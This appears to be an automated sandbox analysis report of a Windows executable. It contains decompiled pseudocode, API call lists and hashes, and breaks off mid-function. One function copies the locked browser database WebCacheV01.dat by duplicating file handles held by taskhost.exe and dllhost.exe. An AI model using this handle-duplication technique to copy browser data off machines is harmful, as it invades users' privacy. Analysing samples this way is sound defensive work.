                                                                                                                                                                    
                                                                                                                                                                    				_t102 = __eax;
                                                                                                                                                                    				_t44 =  *((intOrPtr*)(__eax + 0x63c));
                                                                                                                                                                    				_t100 = __eax + 0x430;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				 *_t100 = 0;
                                                                                                                                                                    				if(_t44 != 1) {
                                                                                                                                                                    					__eflags = _t44 - 2;
                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                    						_t48 = E00403FDE(__eax + 4, __eflags, __eax + 0x640);
                                                                                                                                                                    						__eflags = _t48;
                                                                                                                                                                    						if(_t48 == 0) {
                                                                                                                                                                    							_v8 =  *((intOrPtr*)(_t102 + 0x418));
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					L15:
                                                                                                                                                                    					return _v8;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v580 = 0;
                                                                                                                                                                    				memset( &_v578, 0, 0x208);
                                                                                                                                                                    				_v1108 = _v1108 & 0x00000000;
                                                                                                                                                                    				memset( &_v1106, 0, 0x208);
                                                                                                                                                                    				E0040DACC( &_v1108, 0); // executed
                                                                                                                                                                    				_t55 = wcslen(L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
                                                                                                                                                                    				_t12 = wcslen( &_v1108) + 1; // 0x1
                                                                                                                                                                    				if(_t55 + _t12 >= 0x104) {
                                                                                                                                                                    					_t15 =  &_v580;
                                                                                                                                                                    					 *_t15 = _v580 & 0x00000000;
                                                                                                                                                                    					__eflags =  *_t15;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					E00405930( &_v580,  &_v1108, L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
                                                                                                                                                                    				}
                                                                                                                                                                    				_t60 = E004057D1( &_v580);
                                                                                                                                                                    				_t109 = _t60;
                                                                                                                                                                    				_pop(_t94);
                                                                                                                                                                    				if(_t60 == 0) {
                                                                                                                                                                    					_v8 = 0xfffffffd;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t90 = _t102 + 4;
                                                                                                                                                                    					_t63 = E00403FDE(_t102 + 4, _t109,  &_v580);
                                                                                                                                                                    					_t110 = _t63;
                                                                                                                                                                    					if(_t63 == 0) {
                                                                                                                                                                    						_v20 = _v20 & _t63;
                                                                                                                                                                    						_v16 = _v16 & _t63;
                                                                                                                                                                    						_v12 = 0x1388;
                                                                                                                                                                    						E00406264(E0040621C( &_v52), _t94, L"dllhost.exe");
                                                                                                                                                                    						E00406264( &_v52, _t94, L"taskhost.exe");
                                                                                                                                                                    						E00406264( &_v52, _t94, L"taskhostex.exe");
                                                                                                                                                                    						E00406264( &_v52, _t94, L"taskhostw.exe");
                                                                                                                                                                    						E0040567E(_t100, L"ecv"); // executed
                                                                                                                                                                    						_t77 = E0040C5E9(_t110,  &_v20,  &_v52,  &_v580, _t100); // executed
                                                                                                                                                                    						_t111 = _t77;
                                                                                                                                                                    						_push(_t100);
                                                                                                                                                                    						if(_t77 == 0) {
                                                                                                                                                                    							_v8 = 0xfffffffe;
                                                                                                                                                                    							DeleteFileW(??);
                                                                                                                                                                    							 *_t100 =  *_t100 & 0x00000000;
                                                                                                                                                                    							__eflags =  *_t100;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							if(E00403FDE(_t90, _t111) == 0) {
                                                                                                                                                                    								_v8 =  *((intOrPtr*)(_t102 + 0x418));
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						E0040623E( &_v52);
                                                                                                                                                                    						E00406710( &_v20);
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 00403A36
                                                                                                                                                                    • memset.MSVCRT ref: 00403A50
                                                                                                                                                                      • Part of subcall function 0040DACC: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF
                                                                                                                                                                    • wcslen.MSVCRT ref: 00403A68
                                                                                                                                                                    • wcslen.MSVCRT ref: 00403A77
                                                                                                                                                                      • Part of subcall function 00405930: wcscpy.MSVCRT ref: 00405938
                                                                                                                                                                      • Part of subcall function 00405930: wcscat.MSVCRT ref: 00405947
                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,taskhostw.exe,taskhostex.exe,taskhost.exe,dllhost.exe,00000000), ref: 00403B61
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memsetwcslen$DeleteFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$dllhost.exe$ecv$taskhost.exe$taskhostex.exe$taskhostw.exe
                                                                                                                                                                    • API String ID: 2175868439-3212516833
                                                                                                                                                                    • Opcode ID: 3c4648e6942eed560d361546e61e2842c3ac7f93384aa4be2f8c22040effd09d
                                                                                                                                                                    • Instruction ID: a022d5ce61393d47798dcb13383e44886591ba6ad6dcc354a4b6cd20eba80d87
                                                                                                                                                                    • Opcode Fuzzy Hash: 3c4648e6942eed560d361546e61e2842c3ac7f93384aa4be2f8c22040effd09d
                                                                                                                                                                    • Instruction Fuzzy Hash: 4B41677291061996DB10EFA5DC85ADE73BCEF04319F10457FE505F21C2EB38AB488B59
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                    			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                    				struct HINSTANCE__* _t35;
                                                                                                                                                                    				intOrPtr* _t37;
                                                                                                                                                                    				intOrPtr* _t38;
                                                                                                                                                                    				void* _t41;
                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                    				int _t53;
                                                                                                                                                                    				int _t54;
                                                                                                                                                                    				signed int _t56;
                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                    				int _t61;
                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                    				intOrPtr* _t66;
                                                                                                                                                                    				void* _t67;
                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                    				int _t72;
                                                                                                                                                                    				void* _t73;
                                                                                                                                                                    				intOrPtr _t81;
                                                                                                                                                                    
                                                                                                                                                                    				_t67 = __edx;
                                                                                                                                                                    				_push(0x70);
                                                                                                                                                                    				_push(0x40f3f0);
                                                                                                                                                                    				E0040E2B8(__ebx, __edi, __esi);
                                                                                                                                                                    				_t35 = GetModuleHandleA(0);
                                                                                                                                                                    				if(_t35->i != 0x5a4d) {
                                                                                                                                                                    					L4:
                                                                                                                                                                    					 *(_t73 - 0x1c) = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t66 =  *((intOrPtr*)(_t35 + 0x3c)) + _t35;
                                                                                                                                                                    					if( *_t66 != 0x4550) {
                                                                                                                                                                    						goto L4;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t57 =  *(_t66 + 0x18) & 0x0000ffff;
                                                                                                                                                                    						if(_t57 == 0x10b) {
                                                                                                                                                                    							__eflags =  *((intOrPtr*)(_t66 + 0x74)) - 0xe;
                                                                                                                                                                    							if( *((intOrPtr*)(_t66 + 0x74)) <= 0xe) {
                                                                                                                                                                    								goto L4;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t58 = 0;
                                                                                                                                                                    								__eflags =  *(_t66 + 0xe8);
                                                                                                                                                                    								goto L9;
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							if(_t57 == 0x20b) {
                                                                                                                                                                    								__eflags =  *((intOrPtr*)(_t66 + 0x84)) - 0xe;
                                                                                                                                                                    								if( *((intOrPtr*)(_t66 + 0x84)) <= 0xe) {
                                                                                                                                                                    									goto L4;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_t58 = 0;
                                                                                                                                                                    									__eflags =  *(_t66 + 0xf8);
                                                                                                                                                                    									L9:
                                                                                                                                                                    									_t9 = __eflags != 0;
                                                                                                                                                                    									__eflags = _t9;
                                                                                                                                                                    									 *(_t73 - 0x1c) = _t58 & 0xffffff00 | _t9;
                                                                                                                                                                    								}
                                                                                                                                                                    							} else {
                                                                                                                                                                    								goto L4;
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				 *(_t73 - 4) = 0;
                                                                                                                                                                    				_t61 = 2;
                                                                                                                                                                    				__set_app_type(_t61);
                                                                                                                                                                    				 *0x413700 =  *0x413700 | 0xffffffff;
                                                                                                                                                                    				 *0x413704 =  *0x413704 | 0xffffffff;
                                                                                                                                                                    				_t37 = __p__fmode();
                                                                                                                                                                    				_t63 =  *0x41238c; // 0x0
                                                                                                                                                                    				 *_t37 = _t63;
                                                                                                                                                                    				_t38 = __p__commode();
                                                                                                                                                                    				_t64 =  *0x412388; // 0x0
                                                                                                                                                                    				 *_t38 = _t64;
                                                                                                                                                                    				 *0x4136fc =  *_adjust_fdiv;
                                                                                                                                                                    				_t41 = E0040E2B2();
                                                                                                                                                                    				_t81 =  *0x412000; // 0x1
                                                                                                                                                                    				if(_t81 == 0) {
                                                                                                                                                                    					__setusermatherr(E0040E2B2);
                                                                                                                                                                    					_pop(_t64);
                                                                                                                                                                    				}
                                                                                                                                                                    				E0040E2A0(_t41);
                                                                                                                                                                    				L0040E29A();
                                                                                                                                                                    				_t43 =  *0x412384; // 0x0
                                                                                                                                                                    				 *((intOrPtr*)(_t73 - 0x20)) = _t43;
                                                                                                                                                                    				_t47 = _t73 - 0x2c;
                                                                                                                                                                    				__imp____wgetmainargs(_t47, _t73 - 0x28, _t73 - 0x24,  *0x412380, _t73 - 0x20, 0x40f3c0, 0x40f3c4); // executed
                                                                                                                                                                    				 *((intOrPtr*)(_t73 - 0x30)) = _t47;
                                                                                                                                                                    				_push(0x40f3bc);
                                                                                                                                                                    				_push(0x40f394); // executed
                                                                                                                                                                    				L0040E29A(); // executed
                                                                                                                                                                    				_t71 =  *__imp___wcmdln;
                                                                                                                                                                    				if(_t71 != 0) {
                                                                                                                                                                    					 *(_t73 - 0x34) = _t71;
                                                                                                                                                                    					__eflags =  *_t71 - 0x22;
                                                                                                                                                                    					if( *_t71 != 0x22) {
                                                                                                                                                                    						while(1) {
                                                                                                                                                                    							__eflags =  *_t71 - 0x20;
                                                                                                                                                                    							if( *_t71 <= 0x20) {
                                                                                                                                                                    								goto L19;
                                                                                                                                                                    							}
                                                                                                                                                                    							_t71 = _t71 + _t61;
                                                                                                                                                                    							 *(_t73 - 0x34) = _t71;
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						while(1) {
                                                                                                                                                                    							_t71 = _t71 + _t61;
                                                                                                                                                                    							 *(_t73 - 0x34) = _t71;
                                                                                                                                                                    							_t56 =  *_t71;
                                                                                                                                                                    							__eflags = _t56;
                                                                                                                                                                    							if(_t56 == 0) {
                                                                                                                                                                    								break;
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _t56 - 0x22;
                                                                                                                                                                    							if(_t56 != 0x22) {
                                                                                                                                                                    								continue;
                                                                                                                                                                    							}
                                                                                                                                                                    							break;
                                                                                                                                                                    						}
                                                                                                                                                                    						__eflags =  *_t71 - 0x22;
                                                                                                                                                                    						if( *_t71 == 0x22) {
                                                                                                                                                                    							L18:
                                                                                                                                                                    							_t71 = _t71 + _t61;
                                                                                                                                                                    							__eflags = _t71;
                                                                                                                                                                    							 *(_t73 - 0x34) = _t71;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					L19:
                                                                                                                                                                    					_t49 =  *_t71;
                                                                                                                                                                    					__eflags = _t49;
                                                                                                                                                                    					if(_t49 != 0) {
                                                                                                                                                                    						__eflags = _t49 - 0x20;
                                                                                                                                                                    						if(_t49 <= 0x20) {
                                                                                                                                                                    							goto L18;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					 *(_t73 - 0x4c) = 0;
                                                                                                                                                                    					GetStartupInfoW(_t73 - 0x78);
                                                                                                                                                                    					__eflags =  *(_t73 - 0x4c) & 0x00000001;
                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                    						_t51 = 0xa;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t51 =  *(_t73 - 0x48) & 0x0000ffff;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t53 = E0040BE98(_t64, _t67, __eflags, GetModuleHandleA(0), 0, _t71, _t51); // executed
                                                                                                                                                                    					_t72 = _t53;
                                                                                                                                                                    					 *(_t73 - 0x7c) = _t72;
                                                                                                                                                                    					__eflags =  *(_t73 - 0x1c);
                                                                                                                                                                    					if( *(_t73 - 0x1c) == 0) {
                                                                                                                                                                    						exit(_t72); // executed
                                                                                                                                                                    					}
                                                                                                                                                                    					__imp___cexit();
                                                                                                                                                                    					_t32 = _t73 - 4;
                                                                                                                                                                    					 *_t32 =  *(_t73 - 4) | 0xffffffff;
                                                                                                                                                                    					__eflags =  *_t32;
                                                                                                                                                                    					_t54 = _t72;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
                                                                                                                                                                    					_t54 = 0xff;
                                                                                                                                                                    				}
                                                                                                                                                                    				return E0040E2F1(_t54);
                                                                                                                                                                    			}


























                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2827331108-0
                                                                                                                                                                    • Opcode ID: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
                                                                                                                                                                    • Instruction ID: c002ea54ac36ed1473f3b1447c0311433b5c4b2607527e15f7219f70d0093426
                                                                                                                                                                    • Opcode Fuzzy Hash: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
                                                                                                                                                                    • Instruction Fuzzy Hash: C251A071C40215DBCB34AFA6D9489AD7BB4EB04310F20897FE821BB2E1D7794D96DB48
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040C5E9(void* __eflags, void* _a4, long _a8, void* _a12, long _a16) {
                                                                                                                                                                    				struct _OVERLAPPED* _v8;
                                                                                                                                                                    				struct _OVERLAPPED* _v12;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				struct _OVERLAPPED* _v20;
                                                                                                                                                                    				char _v24;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t38;
                                                                                                                                                                    				void* _t41;
                                                                                                                                                                    				void* _t49;
                                                                                                                                                                    				void* _t52;
                                                                                                                                                                    				int _t55;
                                                                                                                                                                    				int _t57;
                                                                                                                                                                    				void* _t67;
                                                                                                                                                                    
                                                                                                                                                                    				_t57 = 0;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				_t38 = E0040C6FB(_a4, __eflags, _a8, _a12,  &_v8,  &_v12); // executed
                                                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                                                    					_v24 = 0;
                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                    					_v16 = 0x1388;
                                                                                                                                                                    					E00406729(0x8000,  &_v24);
                                                                                                                                                                    					_t41 = OpenProcess(0x40, 0, _v8);
                                                                                                                                                                    					_v8 = _t41;
                                                                                                                                                                    					if(_t41 != 0) {
                                                                                                                                                                    						_a12 = 0;
                                                                                                                                                                    						DuplicateHandle(_v8, _v12, GetCurrentProcess(),  &_a12, 0x80000000, 0, 0); // executed
                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                    							_a8 = GetFileSize(_a12, 0);
                                                                                                                                                                    							_a4 = E00405351(_a16);
                                                                                                                                                                    							_t49 = CreateFileMappingW(_a12, 0, 2, 0, 0, 0); // executed
                                                                                                                                                                    							_v12 = _t49;
                                                                                                                                                                    							if(_t49 != 0) {
                                                                                                                                                                    								_t52 = MapViewOfFile(_t49, 4, 0, 0, _a8); // executed
                                                                                                                                                                    								_t67 = _t52;
                                                                                                                                                                    								if(_t67 != 0) {
                                                                                                                                                                    									_a16 = 0;
                                                                                                                                                                    									_t55 = WriteFile(_a4, _t67, _a8,  &_a16, 0); // executed
                                                                                                                                                                    									_t57 = _t55;
                                                                                                                                                                    									UnmapViewOfFile(_t67);
                                                                                                                                                                    								}
                                                                                                                                                                    								FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                    							}
                                                                                                                                                                    							CloseHandle(_a4);
                                                                                                                                                                    							CloseHandle(_a12);
                                                                                                                                                                    						}
                                                                                                                                                                    						CloseHandle(_v8);
                                                                                                                                                                    					}
                                                                                                                                                                    					E00406710( &_v24);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t57;
                                                                                                                                                                    			}


















                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040C6FB: memset.MSVCRT ref: 0040C725
                                                                                                                                                                      • Part of subcall function 0040C6FB: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
                                                                                                                                                                      • Part of subcall function 0040C6FB: FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
                                                                                                                                                                      • Part of subcall function 0040C6FB: GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
                                                                                                                                                                      • Part of subcall function 0040C6FB: _wcsicmp.MSVCRT ref: 0040C816
                                                                                                                                                                      • Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
                                                                                                                                                                      • Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E
                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C638
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C657
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C664
                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C679
                                                                                                                                                                      • Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C697
                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00001388,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6AC
                                                                                                                                                                    • WriteFile.KERNELBASE(?,00000000,00001388,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6C7
                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D0
                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D9
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6DE
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E3
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationView$??2@??3@DuplicateMappingOpenSizeUnmapWrite_wcsicmpmemset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3028965261-0
                                                                                                                                                                    • Opcode ID: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
                                                                                                                                                                    • Instruction ID: e6db179c7e43cd6fbe3270d478d1169048f03751868c197fc0ca6440827a8631
                                                                                                                                                                    • Opcode Fuzzy Hash: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
                                                                                                                                                                    • Instruction Fuzzy Hash: DD31F5B5800209FFDB11AFA5DD889AE7BB9FB08344F10443AF905B6260D7758E54DB64
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                                    			E00401ED6(signed int __ecx, void* __edx, intOrPtr* _a4) {
                                                                                                                                                                    				char _v516;
                                                                                                                                                                    				char _v520;
                                                                                                                                                                    				intOrPtr _v524;
                                                                                                                                                                    				intOrPtr _v528;
                                                                                                                                                                    				intOrPtr _v532;
                                                                                                                                                                    				intOrPtr _v536;
                                                                                                                                                                    				intOrPtr _v540;
                                                                                                                                                                    				intOrPtr _v544;
                                                                                                                                                                    				void _v546;
                                                                                                                                                                    				char _v548;
                                                                                                                                                                    				signed int _v556;
                                                                                                                                                                    				signed int _v560;
                                                                                                                                                                    				signed int _v564;
                                                                                                                                                                    				signed int _v568;
                                                                                                                                                                    				signed int _v572;
                                                                                                                                                                    				intOrPtr _v576;
                                                                                                                                                                    				int _v580;
                                                                                                                                                                    				short _v582;
                                                                                                                                                                    				void _v584;
                                                                                                                                                                    				intOrPtr _v588;
                                                                                                                                                                    				signed int _v592;
                                                                                                                                                                    				signed int _v596;
                                                                                                                                                                    				wchar_t* _v600;
                                                                                                                                                                    				signed int _v604;
                                                                                                                                                                    				intOrPtr _v624;
                                                                                                                                                                    				char _v632;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				signed int _t73;
                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                    				signed int _t104;
                                                                                                                                                                    				int _t124;
                                                                                                                                                                    				intOrPtr _t126;
                                                                                                                                                                    				signed int _t127;
                                                                                                                                                                    				void* _t131;
                                                                                                                                                                    				intOrPtr* _t151;
                                                                                                                                                                    				signed int _t153;
                                                                                                                                                                    				void* _t156;
                                                                                                                                                                    				void* _t157;
                                                                                                                                                                    
                                                                                                                                                                    				_t134 = __ecx;
                                                                                                                                                                    				_v592 = __ecx;
                                                                                                                                                                    				_v584 = 0;
                                                                                                                                                                    				_v582 = 0;
                                                                                                                                                                    				_v580 = 0;
                                                                                                                                                                    				_v588 = 0x40f634;
                                                                                                                                                                    				_t73 = memset( &_v584, 0, 0x44);
                                                                                                                                                                    				_t126 =  *0x41235c; // 0x0
                                                                                                                                                                    				_t151 = _a4;
                                                                                                                                                                    				_t74 = _t73 | 0xffffffff;
                                                                                                                                                                    				_t156 = (_t153 & 0xfffffff8) - 0x254 + 0xc;
                                                                                                                                                                    				_v572 = _t74;
                                                                                                                                                                    				_v568 = _t74;
                                                                                                                                                                    				_v564 = _t74;
                                                                                                                                                                    				_v560 = _t74;
                                                                                                                                                                    				_t127 = _t126 - 1;
                                                                                                                                                                    				_v520 = 0;
                                                                                                                                                                    				_v600 =  *((intOrPtr*)(_t151 + 0x28));
                                                                                                                                                                    				if(_t127 < 0) {
                                                                                                                                                                    					L3:
                                                                                                                                                                    					_t127 = _t127 | 0xffffffff;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					while(1) {
                                                                                                                                                                    						_t124 = wcscmp(_v600, E00406306(0x412340, _t127));
                                                                                                                                                                    						_pop(_t134);
                                                                                                                                                                    						if(_t124 == 0) {
                                                                                                                                                                    							goto L4;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t127 = _t127 - 1;
                                                                                                                                                                    						if(_t127 >= 0) {
                                                                                                                                                                    							continue;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							goto L3;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L4;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				L4:
                                                                                                                                                                    				if(_t127 != 0xffffffff) {
                                                                                                                                                                    					_t76 = _t127;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t76 = E00406264(0x412340, _t134, _v600); // executed
                                                                                                                                                                    				}
                                                                                                                                                                    				_v556 = _t76;
                                                                                                                                                                    				_v524 =  *((intOrPtr*)(_t151 + 0x2c));
                                                                                                                                                                    				_v548 =  *_t151;
                                                                                                                                                                    				_v544 =  *((intOrPtr*)(_t151 + 4));
                                                                                                                                                                    				_v540 =  *((intOrPtr*)(_t151 + 8));
                                                                                                                                                                    				_v536 =  *((intOrPtr*)(_t151 + 0xc));
                                                                                                                                                                    				_v532 =  *((intOrPtr*)(_t151 + 0x10));
                                                                                                                                                                    				_t129 = _v592 + 0x84c;
                                                                                                                                                                    				_v528 =  *((intOrPtr*)(_t151 + 0x14));
                                                                                                                                                                    				_v596 = _v592 + 0x84c;
                                                                                                                                                                    				E00406434(_v592 + 0x84c,  *((intOrPtr*)(_t151 + 0x20)), 0xffffffff, 0);
                                                                                                                                                                    				_v580 = E00406264(0x412320, _t134, E0040636E(_t129));
                                                                                                                                                                    				E00406434(_t129,  *((intOrPtr*)(_t151 + 0x24)), 0xffffffff, 0); // executed
                                                                                                                                                                    				_v592 = E00406264(0x412320, _t134, E0040636E(_t129));
                                                                                                                                                                    				_t131 = _v624 + 0x860;
                                                                                                                                                                    				 *((intOrPtr*)(_t131 + 0x1c)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t131 + 4)) = 0;
                                                                                                                                                                    				_v632 = 0;
                                                                                                                                                                    				_v548 = 0;
                                                                                                                                                                    				memset( &_v546, 0, 0x1fe);
                                                                                                                                                                    				_t97 = E0040610D(_t134,  &_v632,  &_v548, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
                                                                                                                                                                    				_t157 = _t156 + 0x20;
                                                                                                                                                                    				while(_t97 != 0) {
                                                                                                                                                                    					E00406264(_t131, _t134,  &_v516);
                                                                                                                                                                    					_t97 = E0040610D(_t134,  &_v604,  &_v520, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
                                                                                                                                                                    					_t157 = _t157 + 0x14;
                                                                                                                                                                    				}
                                                                                                                                                                    				E0040637A(_t97 | 0xffffffff, _v596, 0x40f454);
                                                                                                                                                                    				_t104 = _v596;
                                                                                                                                                                    				_v604 = _v604 & 0x00000000;
                                                                                                                                                                    				if( *((intOrPtr*)(_t104 + 0x87c)) > 0) {
                                                                                                                                                                    					do {
                                                                                                                                                                    						if(_v600 != 0) {
                                                                                                                                                                    							_t166 = _t104 | 0xffffffff;
                                                                                                                                                                    							E004063DD(_t104 | 0xffffffff, _t134, _v596, _t104 | 0xffffffff, ".");
                                                                                                                                                                    						}
                                                                                                                                                                    						E004063DD(E00406306(_t131,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1) | 0xffffffff,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1, _v596, _t166, _t116);
                                                                                                                                                                    						_v604 = _v604 + 1;
                                                                                                                                                                    						_t104 = _v596;
                                                                                                                                                                    						_t134 = _v604;
                                                                                                                                                                    					} while (_v604 <  *((intOrPtr*)(_t104 + 0x87c)));
                                                                                                                                                                    				}
                                                                                                                                                                    				_v576 = E00406264(0x412320, _t134, E0040636E(_v596));
